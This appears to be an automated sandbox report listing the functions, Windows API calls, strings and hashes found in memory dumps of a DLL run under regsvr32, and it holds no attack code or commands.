Instruction ID: 91240681ad54e6ec13c49b811ba2d556f551c8c8f946bcf44ea391bb64c09917
Opcode Fuzzy Hash: c17e2ad06564bcccafbd6c05015ad6f98d51abece7a6af01462acf521588f66e
Instruction Fuzzy Hash: BF437F62A0EEC298EB709F2598443FA23B0FB947D9F456135DE4D9BB95DF38A641C300

Function 00007FF8A9305D24 Relevance: 81.4, APIs: 44, Strings: 2, Instructions: 876memoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF8A9306227
HeapCreate.KERNEL32 ref: 00007FF8A930654E
HeapAlloc.KERNEL32 ref: 00007FF8A930655E
GetLastError.KERNEL32 ref: 00007FF8A9306566
memset.MSVCRT ref: 00007FF8A9306583
HeapFree.KERNEL32 ref: 00007FF8A9307E38
HeapFree.KERNEL32 ref: 00007FF8A9308006
HeapFree.KERNEL32 ref: 00007FF8A93081FF
HeapFree.KERNEL32 ref: 00007FF8A9308220
HeapFree.KERNEL32 ref: 00007FF8A9308241
HeapFree.KERNEL32 ref: 00007FF8A930859B
HeapFree.KERNEL32 ref: 00007FF8A93087FA

Strings

called `Result::unwrap()` on an `Err` value, xrefs: 00007FF8A9307C4F, 00007FF8A9307C99, 00007FF8A9307CE3, 00007FF8A9307D2A
assertion failed: filled <= self.buf.init/rustc/051478957371ee0084a7c0913941d2a8c4757bb9\library\core\src\io\borrowed_buf.rs, xrefs: 00007FF8A930776F

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: Heap$Free$memset$AllocCreateErrorLast
String ID: assertion failed: filled <= self.buf.init/rustc/051478957371ee0084a7c0913941d2a8c4757bb9\library\core\src\io\borrowed_buf.rs$called `Result::unwrap()` on an `Err` value
API String ID: 3318353824-3437382133
Opcode ID: f8b0440f740472aa827fe5618991f08f232e5b2608e4990d56343ae69d6835da
Instruction ID: 5384395ef807d63c91fd8e2bd7c27c54190910e5141134c923f8daefeb8c279b
Opcode Fuzzy Hash: f8b0440f740472aa827fe5618991f08f232e5b2608e4990d56343ae69d6835da
Instruction Fuzzy Hash: 5CA26E32A0EFC691EA619F56A4403FAA3B0FB88784F446175DA8D87B99DF7CE145C700

Function 00007FF8A9306288 Relevance: 42.5, APIs: 28, Instructions: 539memoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF8A9306227
HeapCreate.KERNEL32 ref: 00007FF8A930654E
HeapAlloc.KERNEL32 ref: 00007FF8A930655E
GetLastError.KERNEL32 ref: 00007FF8A9306566
memset.MSVCRT ref: 00007FF8A9306583
HeapFree.KERNEL32 ref: 00007FF8A9307E38
HeapFree.KERNEL32 ref: 00007FF8A9308006
HeapFree.KERNEL32 ref: 00007FF8A93081FF
HeapFree.KERNEL32 ref: 00007FF8A9308220
HeapFree.KERNEL32 ref: 00007FF8A9308241
HeapFree.KERNEL32 ref: 00007FF8A930859B
HeapFree.KERNEL32 ref: 00007FF8A93087FA

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: Heap$Free$memset$AllocCreateErrorLast
String ID:
API String ID: 3318353824-0
Opcode ID: 0f2515f124c1592589ab2ecb66db3a6e618d4787a464105d79b420a0954ba612
Instruction ID: 7a8853d97a931cb97b9a38990318550239dc0257c1bca66d8d40bb9aad98c0ad
Opcode Fuzzy Hash: 0f2515f124c1592589ab2ecb66db3a6e618d4787a464105d79b420a0954ba612
Instruction Fuzzy Hash: 87425D25A0EFC6A5EA60DF52A4503BA63B1FB887C4F446176DA8D87B99DF7CE440C700

Function 00007FF8A9304790 Relevance: 34.0, APIs: 18, Strings: 1, Instructions: 711memoryCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF8A93047A6
SetFilePointerEx.KERNEL32 ref: 00007FF8A930484E
SetFilePointerEx.KERNEL32 ref: 00007FF8A93048DB
SetFilePointerEx.KERNEL32 ref: 00007FF8A9304937
HeapFree.KERNEL32 ref: 00007FF8A9307E38

Part of subcall function 00007FF8A9301770: HeapFree.KERNEL32 ref: 00007FF8A930178D
Part of subcall function 00007FF8A9301770: HeapFree.KERNEL32 ref: 00007FF8A93017BD
Part of subcall function 00007FF8A9301770: HeapFree.KERNEL32 ref: 00007FF8A93017D8
Part of subcall function 00007FF8A9301770: HeapFree.KERNEL32 ref: 00007FF8A930180E
Part of subcall function 00007FF8A9301770: CloseHandle.KERNEL32 ref: 00007FF8A9301824
Part of subcall function 00007FF8A9301770: CloseHandle.KERNEL32 ref: 00007FF8A930183A
Part of subcall function 00007FF8A9301770: CloseHandle.KERNEL32 ref: 00007FF8A9301853

Part of subcall function 00007FF8A9301660: HeapFree.KERNEL32 ref: 00007FF8A930167B

HeapFree.KERNEL32 ref: 00007FF8A9308006
HeapFree.KERNEL32 ref: 00007FF8A93081FF
HeapFree.KERNEL32 ref: 00007FF8A9308220
HeapFree.KERNEL32 ref: 00007FF8A9308241
HeapFree.KERNEL32 ref: 00007FF8A930859B
HeapFree.KERNEL32 ref: 00007FF8A93087FA

Strings

Could not find central directory endInvalid digital signature header, xrefs: 00007FF8A930487C

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap$CloseHandle$FilePointer
String ID: Could not find central directory endInvalid digital signature header
API String ID: 3729840729-3300676640
Opcode ID: c83bbb4460c5725f1825f1a45840ff78f6c1bfa055ae816c12aabffbfe23627b
Instruction ID: ce5eabc895989c1d7d9dc1b98798e1acaeace5de96a990bbe742c4e7f1f31758
Opcode Fuzzy Hash: c83bbb4460c5725f1825f1a45840ff78f6c1bfa055ae816c12aabffbfe23627b
Instruction Fuzzy Hash: A5724B61A0EAC690FA749F51A4587FEA3B0FB887C0F406135DA8D86B99EF7DD544CB00

Function 00007FF8A93100B0 Relevance: 22.8, APIs: 15, Instructions: 278
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TlsGetValue.KERNEL32 ref: 00007FF8A93100CA
BCryptGenRandom.BCRYPT ref: 00007FF8A93100FF
SystemFunction036.ADVAPI32 ref: 00007FF8A931011A
TlsGetValue.KERNEL32 ref: 00007FF8A931019A
TlsGetValue.KERNEL32 ref: 00007FF8A9310326
TlsSetValue.KERNEL32 ref: 00007FF8A931033D
HeapFree.KERNEL32 ref: 00007FF8A931035E
HeapFree.KERNEL32 ref: 00007FF8A931036F
TlsSetValue.KERNEL32 ref: 00007FF8A93103A3
HeapFree.KERNEL32 ref: 00007FF8A93104B5
HeapFree.KERNEL32 ref: 00007FF8A93104E0
TlsSetValue.KERNEL32 ref: 00007FF8A9310527
HeapFree.KERNEL32 ref: 00007FF8A9310543
HeapFree.KERNEL32 ref: 00007FF8A9310554
TlsSetValue.KERNEL32 ref: 00007FF8A9310570

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: Value$FreeHeap$CryptFunction036RandomSystem
String ID:
API String ID: 624231926-0
Opcode ID: ae8b67c069fc6a6538d17bba60d52f65b0d460899ef88f32a76e1195104b1311
Instruction ID: 559c281e9c4be8c7cf8e6c0d7cc1e19b2bc2a92133f080e04d0566a4ccfe5dd7
Opcode Fuzzy Hash: ae8b67c069fc6a6538d17bba60d52f65b0d460899ef88f32a76e1195104b1311
Instruction Fuzzy Hash: B3D19121A0EEC1A5FA259F25A4053F963B1FF847C4F14A135DA8D927A6EF3DE581C300

Function 00007FF8A9304703 Relevance: 21.6, APIs: 11, Strings: 1, Instructions: 624COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF8A93047B8
SetFilePointerEx.KERNEL32 ref: 00007FF8A930484E
SetFilePointerEx.KERNEL32 ref: 00007FF8A93048DB
SetFilePointerEx.KERNEL32 ref: 00007FF8A9304937

Part of subcall function 00007FF8A931D410: WaitForSingleObject.KERNEL32 ref: 00007FF8A931D470

Strings

Could not find central directory endInvalid digital signature header, xrefs: 00007FF8A930487C

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FilePointer$CloseHandleObjectSingleWait
String ID: Could not find central directory endInvalid digital signature header
API String ID: 3992305260-3300676640
Opcode ID: 6cc641dd63fe91e49ee1acb258626946365351447a58138e7c75619544ea830f
Instruction ID: de97c452fba625d93bcf9bb063e6d89015671f5fb07975dd427f8814e104d0c6
Opcode Fuzzy Hash: 6cc641dd63fe91e49ee1acb258626946365351447a58138e7c75619544ea830f
Instruction Fuzzy Hash: 2C52286260EBD691FA748F41A4987BEA3B0FB887C0F405135DA8D86B99EF7CD545CB00

Function 00007FF8A930474F Relevance: 21.6, APIs: 11, Strings: 1, Instructions: 618memoryCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF8A93047B8
SetFilePointerEx.KERNEL32 ref: 00007FF8A930484E
SetFilePointerEx.KERNEL32 ref: 00007FF8A93048DB
SetFilePointerEx.KERNEL32 ref: 00007FF8A9304937
SetFilePointerEx.KERNEL32 ref: 00007FF8A9304C1E
GetLastError.KERNEL32 ref: 00007FF8A930712E
GetLastError.KERNEL32 ref: 00007FF8A930715D
HeapFree.KERNEL32 ref: 00007FF8A93072B2
HeapFree.KERNEL32 ref: 00007FF8A93072D3
HeapFree.KERNEL32 ref: 00007FF8A9307311
HeapFree.KERNEL32 ref: 00007FF8A9307341
HeapFree.KERNEL32 ref: 00007FF8A930738B
HeapFree.KERNEL32 ref: 00007FF8A93073D1
HeapFree.KERNEL32 ref: 00007FF8A93073E9
HeapFree.KERNEL32 ref: 00007FF8A930740C
HeapFree.KERNEL32 ref: 00007FF8A930742D
CloseHandle.KERNEL32 ref: 00007FF8A9307437
HeapFree.KERNEL32 ref: 00007FF8A9307513
GetLastError.KERNEL32 ref: 00007FF8A930751A
CloseHandle.KERNEL32 ref: 00007FF8A9307571
GetLastError.KERNEL32 ref: 00007FF8A93078D9
HeapFree.KERNEL32 ref: 00007FF8A9307E38
HeapFree.KERNEL32 ref: 00007FF8A9308006
HeapFree.KERNEL32 ref: 00007FF8A93081FF
HeapFree.KERNEL32 ref: 00007FF8A9308220
HeapFree.KERNEL32 ref: 00007FF8A9308241
HeapFree.KERNEL32 ref: 00007FF8A930859B
HeapFree.KERNEL32 ref: 00007FF8A93087FA

Strings

Could not find central directory endInvalid digital signature header, xrefs: 00007FF8A930487C

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap$ErrorFileLastPointer$CloseHandle
String ID: Could not find central directory endInvalid digital signature header
API String ID: 3659737114-3300676640
Opcode ID: da81dc628056563b111023516c86e316270a5d10d0cba6abbb57364ad9dc5944
Instruction ID: 521c7b3b6309d8a347a915b70a72c1f7cf4cb81958d854d7a6e021eea37c54db
Opcode Fuzzy Hash: da81dc628056563b111023516c86e316270a5d10d0cba6abbb57364ad9dc5944
Instruction Fuzzy Hash: 3452296260EBD691FA748B41A4987FEA3B0FB887C0F405135DA8D86B99EF7CD545CB00

Function 00007FF8A9347C00 Relevance: 20.0, APIs: 13, Instructions: 457
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 00007FF8A9347C60
ProcessPrng.BCRYPTPRIMITIVES ref: 00007FF8A9347C8C
HeapFree.KERNEL32 ref: 00007FF8A9347D37

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: Process$CurrentFreeHeapPrng
String ID:
API String ID: 2687294623-0
Opcode ID: 7ccca035b553b490dbd6fd33f35a1768fee40fbe1abdc2761106d4094eca36f5
Instruction ID: cb986c3e8404820dca2013b897766ecf440c7ffd823585058cff4c6ea4d7a06d
Opcode Fuzzy Hash: 7ccca035b553b490dbd6fd33f35a1768fee40fbe1abdc2761106d4094eca36f5
Instruction Fuzzy Hash: C812D322A0EED199E7548F25D8003BA2BB0FB887E8F056636DE6E877D4DF79D4449340

Function 00007FF8A9305DE8 Relevance: 10.3, APIs: 8, Instructions: 271memoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF8A9306227
HeapCreate.KERNEL32 ref: 00007FF8A930654E
HeapAlloc.KERNEL32 ref: 00007FF8A930655E
GetLastError.KERNEL32 ref: 00007FF8A9306566
memset.MSVCRT ref: 00007FF8A9306583
HeapFree.KERNEL32 ref: 00007FF8A9307E38
HeapFree.KERNEL32 ref: 00007FF8A9308006
HeapFree.KERNEL32 ref: 00007FF8A93081FF
HeapFree.KERNEL32 ref: 00007FF8A9308220
HeapFree.KERNEL32 ref: 00007FF8A9308241
HeapFree.KERNEL32 ref: 00007FF8A930859B
HeapFree.KERNEL32 ref: 00007FF8A93087FA

Part of subcall function 00007FF8A9367FE0: malloc.MSVCRT ref: 00007FF8A9368046

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: Heap$Free$memset$AllocCreateErrorLastmalloc
String ID:
API String ID: 2998993497-0
Opcode ID: f8e63a3019b5660a97cd2ff614013b9790c29846fd5139ed2c4ddc969cac8dfc
Instruction ID: 19c97420669df564dba2274711ba97cdb1f2870c27aaaa4088e14a8a9f22ea40
Opcode Fuzzy Hash: f8e63a3019b5660a97cd2ff614013b9790c29846fd5139ed2c4ddc969cac8dfc
Instruction Fuzzy Hash: 95E1473290EFC591E6358F59E4443EAA3B4FB98384F046236DACD82AA9DF7DD545CB00

Function 00007FF8A9305D44 Relevance: 10.3, APIs: 8, Instructions: 262memoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF8A9306227
HeapCreate.KERNEL32 ref: 00007FF8A930654E
HeapAlloc.KERNEL32 ref: 00007FF8A930655E
GetLastError.KERNEL32 ref: 00007FF8A9306566
memset.MSVCRT ref: 00007FF8A9306583
HeapFree.KERNEL32 ref: 00007FF8A9307E38
HeapFree.KERNEL32 ref: 00007FF8A9308006
HeapFree.KERNEL32 ref: 00007FF8A93081FF
HeapFree.KERNEL32 ref: 00007FF8A9308220
HeapFree.KERNEL32 ref: 00007FF8A9308241
HeapFree.KERNEL32 ref: 00007FF8A930859B
HeapFree.KERNEL32 ref: 00007FF8A93087FA

Part of subcall function 00007FF8A934B740: GetProcessHeap.KERNEL32(?,?,?,00007FF8A9308D4D), ref: 00007FF8A934B781

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: Heap$Free$memset$AllocCreateErrorLastProcess
String ID:
API String ID: 493596415-0
Opcode ID: 366fe9f9771c2bf008d50867babc19da5d5e01b03df766db2f5eff1cb8254fd0
Instruction ID: 4702742aa2e7c53a76fc9cb9739968581b8ab0f652eeeecc47cdbd487ca3c952
Opcode Fuzzy Hash: 366fe9f9771c2bf008d50867babc19da5d5e01b03df766db2f5eff1cb8254fd0
Instruction Fuzzy Hash: 55D16B2290EFC691EA359F55A4443FAA3B4FB88384F446176DA8D86A99DF7CD540CB00

Function 00007FF8A931D410 Relevance: 3.1, APIs: 2, Instructions: 62
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WaitForSingleObject.KERNEL32 ref: 00007FF8A931D470
RtlNtStatusToDosError.NTDLL ref: 00007FF8A931D48D

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: ErrorObjectSingleStatusWait
String ID:
API String ID: 4189389217-0
Opcode ID: 84ea623b709b3c50245635ff3630c2954d6b734c081a746034ccf4ef537e84bf
Instruction ID: 42305de5a61e25c6e47200a45a9d60691c059db22204f1daeb731411e51019f6
Opcode Fuzzy Hash: 84ea623b709b3c50245635ff3630c2954d6b734c081a746034ccf4ef537e84bf
Instruction Fuzzy Hash: E421D862B18EC199F710DF34D4403E937B1EB59398F54A231EA5D82694EF38E1D58740

Function 026EF41C Relevance: 1.6, APIs: 1, Instructions: 382memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 026EF48F

Memory Dump Source

Source File: 00000006.00000002.3245193500.00000000026E0000.00000040.00000020.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26e0000_regsvr32.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 5d17924f1650dce35aa6cfa67234e302229330514130ed1fd0e34ce5b20ef98f
Instruction ID: 7ac3db583bb68e5f6a21f847f9e51aebadb40fdf62023ea763b7328ba8f7d42c
Opcode Fuzzy Hash: 5d17924f1650dce35aa6cfa67234e302229330514130ed1fd0e34ce5b20ef98f
Instruction Fuzzy Hash: 59B18330716E098BCF59EA28D8C57AAB3D2FB98314F14426DC84FC7645EB31E946CB81

Function 00007FF8A9352560 Relevance: 1.4, Strings: 1, Instructions: 141COMMON

Download Yara Rule

Strings

Invalid checksum, xrefs: 00007FF8A9352613

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID:
String ID: Invalid checksum
API String ID: 0-2521479841
Opcode ID: 703e369a81616febad43ec029551244bee53fdc5b60c7c96c89b9f8e7664f4e7
Instruction ID: 1897aff086fa65400c456fdf069a2757b3567566fbb45339e44d3f42595e2f8a
Opcode Fuzzy Hash: 703e369a81616febad43ec029551244bee53fdc5b60c7c96c89b9f8e7664f4e7
Instruction Fuzzy Hash: 485183A6A1AAC59BDA64CF25E1403BAB3B1FB497C0F55A531CF8E97681DF7CE4448300

Function 026EF7F8 Relevance: .4, Instructions: 405COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3245193500.00000000026E0000.00000040.00000020.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26e0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a66aa8eccb36b3c863fa0cf2326f118ce4658279e53cce5a51b176019e00911a
Instruction ID: 2ec0d2ab2e4a7412aa2d7bb5a9ab67d7bddd765b0e3e4300f711e349f42f4e62
Opcode Fuzzy Hash: a66aa8eccb36b3c863fa0cf2326f118ce4658279e53cce5a51b176019e00911a
Instruction Fuzzy Hash: 6ED15C31508A488BDF59DF28C899AEAB7E1FF98310F14466DE88BCB255DF30E542CB41

Function 00007FF8A934A938 Relevance: 15.1, APIs: 10, Instructions: 121
memorysynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

